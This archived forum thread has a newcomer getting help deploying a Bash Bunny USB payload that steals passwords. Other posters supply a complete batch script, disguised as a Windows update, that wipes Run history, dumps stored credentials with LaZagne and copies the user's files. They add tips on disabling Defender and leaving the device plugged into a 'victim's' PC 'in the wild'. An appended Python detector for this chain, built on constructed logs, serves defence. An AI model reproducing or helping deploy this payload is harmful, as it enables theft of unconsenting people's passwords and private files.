Cech Posted November 15, 2017
Hey guys, my Bash Bunny just arrived! But there is one problem: I've tried some payloads and all of them worked fine, but I had a problem with PasswordGrabber. There are a few codes in different documents, so could anyone tell me how to set it up on the Bash Bunny? https://github.com/hak5/bashbunny-payloads/pull/67 This is the script, but I don't really get how to place it on the Bash Bunny. Thank you in advance!
PoSHMagiC0de Posted November 15, 2017
1) If you have not yet, update the Bunny; if you have, ignore this. This is just the common first answer you will get and has been the answer to many questions.
2) This payload needs an external project added, the LaZagne project, the compiled version for Windows, and it has to be in the switch folder with the payload.txt. The compiled version is on the site too, or you can follow the directions for the LaZagne project to do your own compiling.
Cech (Author) Posted November 17, 2017
I did everything, but nothing seems to work :/ (d.exe, e.exe, i.vbs, lazagne.exe, lazagne.py, payload.txt and readme.md) These are the files added to the switch folder, but once I plug it in I get empty directories. Also, my firmware is 1.4.
RazerBlade Posted November 17, 2017
laZagne.py should not be there. Also, check out my latest pull request on password grabber; it fixes and makes some things a bit easier to understand: https://github.com/hak5/bashbunny-payloads/pull/293/files
Cech (Author) Posted November 17, 2017
Hello RazerBlade, first of all thank you for your answer. But, since I'm a bit new to this, would you please explain to me which file goes where? Which file should go in the switch and which file should go somewhere else? It's probably easier to understand for you professionals, but not for regular people like me :)
PoSHMagiC0de Posted November 18, 2017
I don't remember the e and d files being exes. They were cmd files. Try this. If you got the lazagne.exe, then copy it to the machine and run it. According to the command file, the command below should display output to the screen.
lazagne.exe all -v
If you get something, then we know LaZagne works. Next, with the Bash Bunny in arming mode, run the command again but add " > driveletterofBB:\loot\lazagnetest.txt", where driveletterofBB is the current drive letter of the Bash Bunny. We are just testing here to make sure everything works piece by piece.
Cech (Author) Posted November 18, 2017
Whenever I open lazagne.exe (directly or through cmd) I get the following error and the program closes within a second.
lazaGne.exe: error: too few arguments
PoSHMagiC0de Posted November 18, 2017
Are you including the "all" and the "-v"? If LaZagne is not even working, then that explains the empty payload folder.
D31M0Z Posted November 19, 2017
In the Explorer window, shift+right click, open PowerShell/cmd at location, then ./laZagne.exe all -v should do it.
D31M0Z Posted November 19, 2017
When you just double click to run it, it will error.
Cech (Author) Posted November 19, 2017
OK, it works, it found all my passwords, but how do I place it in switch2 so that when I plug the Bash Bunny into the victim's PC the script starts attacking and saves all the passwords in the loot folder instead of making empty directories?
D31M0Z Posted November 20, 2017
Place it in the same switch folder as the payload: http://fav.me/dbu9s93
This is the line in e.cmd that runs laZagne.exe: http://fav.me/dbu9smb
This is the line for your xcopy command (the one I have inserted pulls any existing MS Word docs from the active user profile): http://fav.me/dbu9spt
Hope the links worked and it helped!
D31M0Z Posted November 20, 2017
The *'s are 'wildcards'; you can replace them with desired target names or change the file extension (.doc) to any desired.
Cech (Author) Posted November 20, 2017
I just followed all your steps and still I get an empty directory :/
D31M0Z Posted November 20, 2017
Could be Windows Defender blocking LaZagne from working; it was the only thing I found that would give me an empty password.txt if it was active during the scan. It also auto-deletes hack tools or quarantines them automatically when active, so I always shut it off before arming my Bunny.
Cech (Author) Posted November 20, 2017
Do I need to configure something in these files, or do I just need to place them in the "Switch2" directory along with the laZagne.exe file? If there is any configuration required for the following files, can you please help me out to sort these things out?
d.cmd
e.cmd
i.vbs
payload.txt
readme.md
D31M0Z Posted November 20, 2017
Configure the xcopy command in e.cmd to whatever you're trying to grab. I also found that if I have set up internet sharing with the Bunny it won't dump files, but it still grabs passwords with LaZagne. If you have sharing turned on in your main network card, turn it off when testing the payload. lazagne.exe/i.vbs/e.cmd/d.cmd/payload.txt should all be in the same switch (1/2) folder so they can be used together. *Also use Notepad++, not Notepad, because it works better.
Cech (Author) Posted November 20, 2017
Is this correct now? e.cmd
D31M0Z Posted November 20, 2017
The link you provided doesn't work since it's a local file, not an internet file, lol. But here is my e.cmd for txt files:

@echo off
@echo Installing Windows Update
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
setlocal
REM Below uses the laZagne.exe in your switch folder
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
REM Below runs xcopy to grab files specified by location and file extension (the one below grabs simple .txt documents).
REM Try making a txt document on your desktop labeled target.txt, then run the payload to see if it grabs it.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.txt %dst% >>nul)
REM The line below spams caps lock to tell you that the payload is done and files are copied (if you have a caps lock LED on your keyboard it should blink when the payload finishes).
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit
Cech (Author) Posted November 20, 2017
First I had to make a few changes because I had an error in the previous one saying that "gwin" does not exist (or something like that), so I've added the following code:

@echo off
@echo Installing Windows Update
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Creates directory comprised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious

The script ran smoothly, but then the PowerShell window appeared and closed. I thought everything was perfect before I went to the last step of opening the loot directory. The loot directory is empty again..
D31M0Z Posted November 20, 2017
The only line I change when coming from a fresh payload copy is the one below. The *'s are wildcards, so the xcopy will search any directories or names in the user profile containing txt files. The /C /Q /G /Y are explained below the xcopy command; /S makes sure it doesn't grab empty folders.

if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.doc %dst% >>nul
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.
REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
)
D31M0Z Posted November 20, 2017
4 minutes ago, Cech said:
First I had to make a few changes because I had an error in the previous one saying that "gwin" does not exist (or something like that), so I've added the following code:
@echo off
@echo Installing Windows Update
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Creates directory comprised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
The script ran smoothly, but then the PowerShell window appeared and closed. I thought everything was perfect before I went to the last step of opening the loot directory. The loot directory is empty again..

The PowerShell opening then closing is the first line; everything else needs to load, so don't prematurely pull the Bunny. Wait for that caps lock to blink for the okay from the Bunny itself. The loot folder should contain a directory labeled with the victim, then a txt file containing the LaZagne scan. For example, if I were to deploy this in the wild I would make sure it can be inserted and left for at least 5-10 min to make sure the xcopy command finishes and exits, so I don't miss anything. It doesn't need to be 5-10 min (it only needs to hit the last line where it flashes caps lock), but it gives me a time frame to wait on, then come back to it and pull.
Cech (Author) Posted November 20, 2017
This is kind of strange.. I've copied all your files and when I plugged in the USB I got the notepad with all the usernames and passwords, so I was like... wow, let's try it out again. The second time when I put in the USB (I was waiting for the caps lock to finish blinking) I again get empty directories... I was like, let's try once more, maybe I did something wrong; I placed the USB in my computer and again, empty directories..
D31M0Z Posted November 20, 2017

@echo off
@echo Installing Windows Update
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Creates directory comprised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
if Exist %USERPROFILE%\* (xcopy /C /Q /G /Y /S %USERPROFILE%\*\*.txt %dst% >>nul
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.
REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
)
REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
@cls
@exit
D31M0Z Posted November 20, 2017
Above is a direct copy of my e.cmd; e.cmd is the only file I ever edit on this payload.
**Try running it, and before pulling the Bash Bunny try to 'eject' it from Windows; if Windows gives you an error message saying it's busy, then xcopy is still running, so you need to wait.**
**The BB is fast, but you still need to give it time for some payloads, especially exfiltration payloads.**
**Just think about how long it takes you to move pictures or docs onto a normal flash drive; the BB does have a great transfer rate though, lol.**
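From the defender's side, the e.cmd posted above leaves a recognisable trail in process-creation telemetry: a reg.exe deletion of the RunMRU key, a laZagne.exe launch, an xcopy of user-profile files to a volume other than the system drive, and a hidden PowerShell SendKeys call, all within a minute or two. The following is an added detection example, not code from this thread or from the bashbunny-payloads project. It assumes a simple "<iso-timestamp> <image> | <command line>" log layout that is constructed for the example (real Sysmon Event ID 1 or Security 4688 records would need their own parser), and the sample events are constructed as well, not captured from a host.

```python
"""Detection logic for the behaviour chain the thread's e.cmd performs:
RunMRU history wipe, LaZagne execution, xcopy of user-profile files to a
second volume, and a hidden PowerShell SendKeys call. Added defender-side
example, not code from the thread or the bashbunny-payloads project; the
process-creation log layout "<iso-timestamp> <image> | <command line>" and
the sample events are constructed for this example, not captured telemetry."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed sample events in the assumed "<timestamp> <image> | <cmdline>" layout.
SAMPLE_EVENTS = [
    "2017-11-20T10:01:02 C:\\Windows\\System32\\reg.exe | REG DELETE "
    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f",
    "2017-11-20T10:01:03 E:\\payloads\\switch2\\laZagne.exe | "
    "E:\\payloads\\switch2\\laZagne.exe all",
    "2017-11-20T10:01:05 C:\\Windows\\System32\\xcopy.exe | xcopy /C /Q /G /Y /S "
    "C:\\Users\\alice\\*\\*.txt E:\\loot\\USB_Exfiltration\\PC1_20171120_100103",
    "2017-11-20T10:01:40 C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | "
    "powershell.exe -nologo -WindowStyle Hidden -sta -command "
    "\"$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}')\"",
    "2017-11-20T10:05:00 C:\\Windows\\System32\\notepad.exe | notepad.exe C:\\Users\\alice\\notes.txt",
]


@dataclass
class Event:
    ts: datetime
    image: str
    cmdline: str


def parse_event(line: str) -> Event:
    """Split one log line in the constructed layout into its three fields."""
    ts, rest = line.split(" ", 1)
    image, cmdline = rest.split(" | ", 1)
    return Event(datetime.fromisoformat(ts), image, cmdline)


# Each rule matches one step of the chain shown in the thread's e.cmd.
RULES = {
    "runmru_history_wipe": re.compile(
        r"\breg(?:\.exe)?\s+delete\s+\S*\\Explorer\\RunMRU\b.*\s/f\b", re.I),
    "lazagne_execution": re.compile(r"\blazagne(?:\.exe)?\b", re.I),
    "hidden_powershell_sendkeys": re.compile(
        r"powershell.*-windowstyle\s+hidden.*sendkeys", re.I),
}
# xcopy <flags...> <source> <destination>
XCOPY = re.compile(r"\bxcopy(?:\.exe)?\s+((?:/\w+\s+)*)(\S+)\s+(\S+)", re.I)


def match_rules(ev: Event) -> List[str]:
    """Return the names of every indicator that fires on one event."""
    hits = [name for name, rx in RULES.items()
            if rx.search(ev.cmdline) or rx.search(ev.image)]
    m = XCOPY.search(ev.cmdline)
    if m:
        src, dst = m.group(2), m.group(3)
        # Profile data leaving the system drive for another volume (the USB
        # device in the thread's case). Legitimate backups fire this too, so
        # it is scored together with the other indicators in analyze().
        if "\\users\\" in src.lower() and dst[1:2] == ":" and dst[0].upper() != "C":
            hits.append("xcopy_user_data_to_other_volume")
    return hits


def analyze(lines: List[str], window: timedelta = timedelta(minutes=5)
            ) -> Tuple[Dict[str, List[datetime]], bool]:
    """Map each indicator to the timestamps it fired at, and report whether
    two or more distinct indicators fired within `window` of each other,
    which is the shape of the payload running end to end."""
    hits: Dict[str, List[datetime]] = {}
    for ev in map(parse_event, lines):
        for name in match_rules(ev):
            hits.setdefault(name, []).append(ev.ts)
    timeline = sorted((t, n) for n, ts in hits.items() for t in ts)
    chained = any(
        len({n for t, n in timeline[i:] if t - t0 <= window}) >= 2
        for i, (t0, _) in enumerate(timeline))
    return hits, chained


if __name__ == "__main__":
    found, chained = analyze(SAMPLE_EVENTS)
    for name, times in found.items():
        print(f"{name}: {[t.isoformat() for t in times]}")
    print("chained payload behaviour:", chained)
```

Run against the constructed sample, all four indicators fire within 40 seconds and the chain is reported; the notepad.exe line and an xcopy that stays on the system drive produce nothing. The xcopy indicator on its own is noisy (any backup to a removable disk looks the same), which is why the verdict is based on several distinct indicators inside a short window rather than on any one of them.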
Archived
This topic is now archived and is closed to further replies.